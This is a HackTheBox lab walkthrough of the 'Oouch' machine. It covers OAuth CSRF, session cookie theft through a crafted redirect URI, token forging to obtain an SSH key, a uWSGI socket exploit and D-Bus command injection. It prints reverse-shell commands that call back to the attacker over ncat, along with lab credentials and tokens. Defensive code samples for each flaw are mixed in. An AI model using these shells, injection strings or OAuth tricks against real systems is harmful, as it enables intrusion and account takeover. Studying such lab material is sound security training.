OOUCH — HTB walkthrough

Dhanishtha Awasthi
10 min read · Aug 1, 2020


I liked that the machine was designed to be attacked, though it was quite unresponsive many times. The machine introduced a good amount of CSRF and OAuth attacks. A good machine to learn a lot from. Let's get to work without much chit-chat.

CSRF
OAUTH TOKEN BYPASS
uWSGI - mu wiz gee
Dbus
Docker

ENUMERATION

nmap scan

FTP 21 Enumeration

— — Flask Web Framework for Consumer

— — Django Web Framework for Authorization Server

SSH 22 ENUMERATION

— — Great, we see here that SSH will only accept a public key it already trusts. So whenever we get a user with access to .ssh we can try to log in over SSH by adding our public key to authorized_keys, or log in directly as someone if we have their private key.

PORT 5000/8000 Enumeration

— — Port 5000 Consumer Server && — — Port 8000 Authorization Server

Port 5000

WELCOME TO OOUCH

— Home | — Login | — Register

Let's register a user and log in.

Juicy things in Profile

— — No Accounts connected

Also on the contact page we see a message hinting that this field is not for malicious inputs; then it could be SSRF. — — to contact admin

Let's run a gobuster scan on this site to explore other directories.

We see an interesting directory here, oauth; let's visit it. Remember, Django is our authorization server.

On visiting this page it shows an error, because 10.10.10.177 is not mapped to consumer.oouch.htb. Let's do that in the /etc/hosts file.

correct it to consumer.oouch.htb

Log in to consumer.oouch.htb

After login we go to the connect link

http://consumer.oouch.htb:5000/oauth/connect

Which redirects to authorization.oouch.htb — — — add this to our hosts file /etc/hosts and reload the connect link

On visiting the home page, authorization.oouch.htb:8000/, we find options to register and log in. Let's register there.

Now, as we have seen earlier, after connecting our account we should log in. Here we will log in as ADMIN instead of the account we created as Offs3cg33k.

For this let’s visit http://consumer.oouch.htb:5000/oauth/connect

Keep Burp Suite intercept on to intercept the request. We see the authorize request. But we don't want to authorize ourselves to our own account; we want to authorize ourselves to the Admin account. So we will send the link (the SSRF link) via the contact form to the admin so that he connects to us. For this, using Burp, do as follows.

Keeping intercept on, click on Authorize

Forward POST /oauth/authorize/?client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read

Capture the next oauth/token request in Repeater and drop it.

Request : GET /oauth/connect/token?code=m8dHG9yUfSuBIZBde4HjD5lkcBvWIT

This request contains the OAuth token for our account.

Now we go to the contact page: consumer.oouch.htb:5000/contact

Send this to the admin using the contact form:

http://consumer.oouch.htb:5000/oauth/connect/token?code=m8dHG9yUfSuBIZBde4HjD5lkcBvWIT

Now, again keeping Burp on, let's go to the link (do not go to login from consumer.oouch.htb:5000/oauth — — this will redirect the request to your own authorization, but we need it from the admin account, so open this link separately in a new tab)

http://consumer.oouch.htb:5000/oauth/login

And authorize the request

Now we have the profile for QTC.
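The forwarded /oauth/connect/token link works because the consumer links whatever account the code belongs to, without checking that the callback belongs to the browser session that started the connect flow. The following is an added example, not the box's or the author's code, of the check an OAuth client should make: bind a random state value to the session when building the authorize URL and refuse any callback whose state does not match. The client id is a constructed stand-in; the hostnames and path are the ones from the walkthrough.

```python
import hmac
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed stand-ins (the real client_id of the box is not reproduced here).
AUTH_SERVER = "http://authorization.oouch.htb:8000/oauth/authorize/"
CLIENT_ID = "EXAMPLE-CLIENT-ID"
REDIRECT_URI = "http://consumer.oouch.htb:5000/oauth/connect/token"


def start_connect(session: dict) -> str:
    """Build the authorize URL and bind a fresh state value to the user's session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    params = {
        "client_id": CLIENT_ID,
        "response_type": "code",
        "redirect_uri": REDIRECT_URI,
        "scope": "read",
        "state": state,
    }
    return AUTH_SERVER + "?" + urlencode(params)


def handle_callback(session: dict, callback_url: str) -> Optional[str]:
    """Return the authorization code only if the callback carries the state bound to this session.

    The state is consumed on first use, so a replayed or forwarded link is rejected
    even if it was copied from a legitimate flow.
    """
    expected = session.pop("oauth_state", None)
    query = parse_qs(urlparse(callback_url).query)
    presented = query.get("state", [""])[0]
    code = query.get("code", [""])[0]
    if not expected or not hmac.compare_digest(expected, presented):
        # No state in this session, or a state minted for someone else's session:
        # do not link the account that this code belongs to.
        return None
    return code or None


if __name__ == "__main__":
    admin_session = {}
    print(start_connect(admin_session))
    # A link whose code (and state) came from another user's flow is refused.
    print(handle_callback(admin_session, REDIRECT_URI + "?code=SOMEONE_ELSES_CODE"))
```

With this check in place, a link pasted into the contact form by another user carries either no state or a state minted for that user's session, so the admin's account is never linked to it.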

QTC Enumeration

So we have credentials for developer. Let's do a quick gobuster scan on authorization.oouch.htb:8000/

An "applications" directory is found; let's explore that. An authentication screen appears, but we cannot log in as develop : supermegasecureklarabubu123!

Let's continue with our gobuster brute-forcing

We found a directory named register. Let's browse there with our credentials:

We got an option to register a new application. I have copied the following values from the register-app screen. These values will be used for further OAuth exploitation.

App URL: http://authorization.oouch.htb:8000/oauth/applications/2/
Client ID: SIcsxLuXJx8WbgWiAcv1Teym8QBZIBfKQn7j8Mzo
Client Secret: vlsWSCe4eADFljdLrDHrMWz7vlU4XpZ3TIKDqTtBndhgrbZQ1HRg6MEieIdx7A2feux2IIE183qnpSJea6qd5GU6nNqRN04jXyh3capIJMaPmi0ZAdKGFm21uP87EdQH
Auth Grant Type: Authorization Code
Redirect URI: <our server>

Hint: We are sending the redirect URI as our server so that we can capture the cookie of the QTC user.

Now, using the contact form of QTC, we will send an OAuth request to authorize our application.

For this, first we will craft our request.

Refer : https://www.oauth.com/oauth2-servers/authorization/the-authorization-request/

So our request will look something like this:

http://authorization.oouch.htb:8000/oauth/authorize/?client_id=SIcsxLuXJx8WbgWiAcv1Teym8QBZIBfKQn7j8Mzo&redirect_uri=http://10.10.14.155:1234/&grant_type=authorization_code&client_secret=vlsWSCe4eADFljdLrDHrMWz7vlU4XpZ3TIKDqTtBndhgrbZQ1HRg6MEieIdx7A2feux2IIE183qnpSJea6qd5GU6nNqRN04jXyh3capIJMaPmi0ZAdKGFm21uP87EdQH

Keep a netcat listener on our machine on port 1234. Send this using Offs3cg33k's profile contact form.

Remember this application registration request is sent from Offs3cg33k's account and not QTC's.

On netcat, after a few minutes, you will find

sessionid=wrbn82e4k9b6c03ghyntj1vhopfepuj3

Why did we do what we did above? Because we want QTC to authorize our app by clicking on the OAuth SSRF link we sent above. By doing this we captured QTC's session cookie, because we knew that the session id would be required while registering the app, as it was part of the registration <grant type> we created above.

EXPLOITATION

Now using a cookie editor we will log into the authorization account of QTC instead of Offs3cg33k

Now change the session id to the one we got

Save and reload the page

We have already used /oauth/authorize to exploit the SSRF vulnerability and log into authorization as QTC. Now we will use /oauth/token to get the token. For this we need to make changes to the application we created earlier. We will change the grant type from Authorization Code to Client Credentials.

Why? Because of course we need the creds of qtc, dude!!!

For this, first visit the application at http://authorization.oouch.htb:8000/oauth/applications/2/

To do this, first log into authorization.oouch.htb:8000/login as Offs3cg33k_auth

Make the changes in grant type

After saving changes

Log in as QTC

How? — — The cookie might have expired, so again send the request from 10.10.10.177:5000/contact to the admin and listen on netcat. Capture the new cookie, set it in the cookie editor and log in as QTC.

Now, keeping Burp Suite on, go to oauth/token

To forge the token we need to make changes to the request

Refer : https://www.oauth.com/oauth2-servers/device-flow/token-request/

So the changes to our request will be as follows, and the response is captured in Repeater

Now we have our access token for QTC

"access_token": "h64xX5uJzsUycz2znMow22tG9q6MnP"

As per the hint in the documents in QTC's profile: /api/get_user >>> user data

Forged request : http://authorization.oouch.htb:8000/api/get_user?access_token=h64xX5uJzsUycz2znMow22tG9q6MnP

Now, as per the hint in the documents, the SSH key can be obtained using the same trick

http://authorization.oouch.htb:8000/api/get_ssh?access_token=h64xX5uJzsUycz2znMow22tG9q6MnP

Now we will make some changes to bring this into the proper format.

Now let us edit the key:

  1. Remove all \n newline characters
  2. Also remove the user data from the beginning

I have replaced all \n with nothing; this removes all the \n characters.

SSH into user qtc

Got USER !!!!

PRIVILEGE ESCALATION

Start by enumerating the user qtc and their rights

In home directory we find some notes

Listing the processes we find

Docker is running a proxy on the 172.18.0.1/16 range. Let's see the IP configuration.

Let's try to connect to the docker container using the SSH keys we have in the home folder in .ssh/authorized_keys

Trial and error gives us an SSH login at 172.18.0.3

Enumerating processes we see

uWSGI (source code), pronounced “mu wiz gee”, is a Web Server Gateway Interface (WSGI) server implementation that is typically used to run Python web applications.

Enumerating more shows us a directory named code. The config file shows us:

MySQL DB credentials for qtc are found here

We have uwsgi.socket in the /tmp folder, which is controlled by www-data

Also, as per the hint in .note.txt, when we look at the routes.py file on oouch we see that a way to protect against XSS attacks is implied.

To see what it does, let's look at the config files on qtc

We see here that www-data can receive and send messages when handling an XSS attack.

Exploitation to get root

Let's first look at uWSGI exploitation. We can get the uwsgi_exploit Python script on GitHub.

Download the script to your machine

We will transfer uwsgi_exp.py and ncat from our machine to oouch

Used curl to copy the scripts to the victim machine. I have hosted a Python HTTP server on port 8000 on my machine

Now we will need to transfer these files from oouch to the docker container. We can do this using scp

Now on the docker container we will run the script

The error occurs because the bytes module is already imported, so we need to make changes to our uwsgi_exp.py and transfer it again

The following will be the final lines of the script.

After saving this, transfer it back to qtc@172.18.0.5:/tmp, as we did above using curl.

Open netcat on qtc@oouch: nc -lvp 3333

Meanwhile, send the request from qtc@172.18.0.5:/tmp to get a shell on qtc@oouch

Request from qtc@172.18.0.5:/tmp:

python uwsgi_exp.py -m unix -u /tmp/uwsgi.socket -c "/tmp/ncat -e /bin/bash 172.17.0.1 3333"

By this you get a reverse shell as www-data on qtc@oouch.
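From the defender's side, the step above only works because a uWSGI socket under /tmp can be written to by a user other than the one running the workers; uWSGI executes whatever a writer sends over it. Below is an added example, not the box's or the author's code, of a small audit that lists UNIX sockets in a directory that any local user can write to. The demo() function builds two constructed sockets in a temporary directory so the check runs offline; the file names are assumptions.

```python
import os
import socket
import stat
import tempfile


def world_writable_sockets(directory: str) -> list:
    """Return the UNIX sockets directly under `directory` whose mode grants write to 'other'.

    A socket like that accepts packets from every local account, so a foothold as any
    user becomes code execution as the account that owns the listening process.
    """
    findings = []
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        try:
            st = os.lstat(path)
        except FileNotFoundError:
            continue  # raced with a cleanup; nothing to report
        if stat.S_ISSOCK(st.st_mode) and st.st_mode & stat.S_IWOTH:
            findings.append(path)
    return sorted(findings)


def demo() -> dict:
    """Create two constructed sockets (one loose, one tight) and run the audit over them."""
    workdir = tempfile.mkdtemp(prefix="sock-audit-")
    results = {}
    # Constructed names: 'uwsgi.socket' mirrors the walkthrough, mode 666 is the weak setting;
    # 'app.sock' with mode 660 is the corrected setting (owner and group only).
    for name, mode in (("uwsgi.socket", 0o666), ("app.sock", 0o660)):
        path = os.path.join(workdir, name)
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(path)          # creates the socket inode on disk
        os.chmod(path, mode)  # mode is set explicitly so umask does not matter
        s.close()             # the inode stays behind, as it would for a running server
        results[name] = path
    results["flagged"] = [os.path.basename(p) for p in world_writable_sockets(workdir)]
    return results


if __name__ == "__main__":
    print(demo())
```

For uWSGI itself the fix is to set `--chmod-socket` to a restrictive value (660 rather than 666) and `--chown-socket` to the web server's user and group, and to keep the socket out of a shared directory such as /tmp.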

Exploitation 2

From www-data send a dbus message and you get a root shell on qtc@172.18.0.5

Message from www-data:

dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block "string:; rm /tmp/offs3cg33k; mkfifo /tmp/offs3cg33k | /bin/bash -i 2>&1 | ncat 172.18.0.5 2345 > /tmp/offs3cg33k;"

What are we doing here:

  1. dbus-send : sends the message
  2. --system : type of message (the system bus)
  3. --print-reply : print whatever reply is generated
  4. --dest= : where you want to send this (we want to send it to the Block object, which is made to block XSS-style attacks)
  5. Destination object path: /htb/oouch/Block
  6. The method we call on it: htb.oouch.Block.Block
  7. string:; means the string value contains nothing
  8. Remove /tmp/offs3cg33k : offs3cg33k is the name of the named pipe we want to create, so remove it if it already exists
  9. Make a FIFO pipe: offs3cg33k, a named pipe
  10. Then run /bin/bash in interactive mode, sending stderr to stdout
  11. And then run ncat from the interactive bash to make a reverse connection on port 2345, sending the output to the named pipe offs3cg33k

This technique is called a bi-directional ncat connection using a named pipe.

Sending this from www-data, we get a root shell on qtc@172.18.0.5

Get root.txt from there. <Apologies: forgot to take screenshots of this>
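The reason a D-Bus string argument turns into a root shell is a command injection: the ";" in the message ends whatever command the Block service builds from the string and starts ours, which only works if that string reaches a shell. The page does not show the service's source, so the following added example (not the box's or the author's code) reproduces that pattern as an assumption, with an assumed iptables blocking action, and places the hardened version beside it: validate the value as an IP address and build an argv list to hand to subprocess.run() without a shell. Neither function executes anything; they return the command they would run so the difference is visible.

```python
import ipaddress
from typing import List


def block_command_unsafe(client_ip: str) -> str:
    """Vulnerable pattern (assumed to resemble the Block service on the box).

    The untrusted string is spliced into a shell command line. A shell parses ';' as a
    command separator, so the caller's text after it runs as a second command with the
    privileges of the service (root, since it manages the firewall).
    """
    return "iptables -A INPUT -s " + client_ip + " -j DROP"


def block_command_safe(client_ip: str) -> List[str]:
    """Hardened pattern: the value must parse as an IPv4/IPv6 address, and the command is an
    argv list, so it is executed without a shell and metacharacters have no meaning."""
    try:
        ip = ipaddress.ip_address(client_ip.strip())
    except ValueError:
        raise ValueError("refusing to block non-address input: %r" % client_ip)
    return ["iptables", "-A", "INPUT", "-s", str(ip), "-j", "DROP"]


def handle_block_message(payload: str) -> dict:
    """What a hardened Block method should return for the string argument of one D-Bus call.

    `argv` is the list to pass to subprocess.run(argv, shell=False); it is not run here.
    """
    try:
        argv = block_command_safe(payload)
    except ValueError as exc:
        return {"accepted": False, "argv": None, "reason": str(exc)}
    return {"accepted": True, "argv": argv, "reason": "valid address"}


if __name__ == "__main__":
    # Constructed inputs: one real address and one injection-shaped string.
    for value in ("10.10.14.155", "; rm /tmp/offs3cg33k"):
        print("unsafe :", block_command_unsafe(value))
        print("safe   :", handle_block_message(value))
```

A second, independent control is on the bus itself: the D-Bus policy file decides which users may send to htb.oouch.Block, and the walkthrough's config-file step shows that www-data was granted that right, which is what turns a web-server compromise into a root-level call.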

ROOTED!!!

Comments and responses are most welcome. If you liked the walkthrough, please like. Happy hacking.
